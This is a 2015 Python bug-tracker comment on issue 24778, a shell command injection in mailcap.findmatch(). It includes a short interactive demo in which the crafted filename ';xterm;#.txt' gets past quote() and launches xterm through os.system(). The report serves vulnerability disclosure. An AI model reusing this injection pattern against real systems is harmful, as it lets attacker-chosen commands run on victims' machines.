[issue24778] mailcap.findmatch() ........ Shell Command Injection in filename
Bernd Dietzel
report at bugs.python.org
Mon Aug 3 22:31:07 CEST 2015
Bernd Dietzel added the comment:
Exploid Demo wich works with quote() :
>>> commandline,MIMETYPE=mailcap.findmatch(d, 'text/*', filename=quote(';xterm;#.txt'))
>>> commandline
"less '';xterm;#.txt''"
>>> os.system(commandline)
### xterm starts
----------
_______________________________________
Python tracker <report at bugs.python.org>
<http://bugs.python.org/issue24778>
_______________________________________
More information about the Python-bugs-list
mailing list